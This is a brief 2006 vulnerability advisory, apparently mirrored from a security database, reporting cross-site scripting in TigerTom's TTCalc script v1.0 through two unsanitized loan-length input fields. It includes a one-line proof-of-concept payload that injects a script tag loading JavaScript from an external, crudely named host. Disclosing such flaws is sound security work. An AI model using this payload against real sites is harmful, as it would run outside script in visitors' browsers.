Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13433
HistoryJul 06, 2006 - 12:00 a.m.

TigerTom Scripts

2006-07-0600:00:00
vulners.com
6

TigerTom Scripts

Homepage:
http://www.ttfreeware.co.uk/

Affected files:
TTCalc script v1.0


Data pased in the "Length of loan, years" and "Length of mortgage, years" input boxes are not
sanatized before being generated.

For a PoC in the input boxes listed above simply put:

<SCRIPT SRC=http://youfucktard.com/xss.js&gt;&lt;/SCRIPT&gt;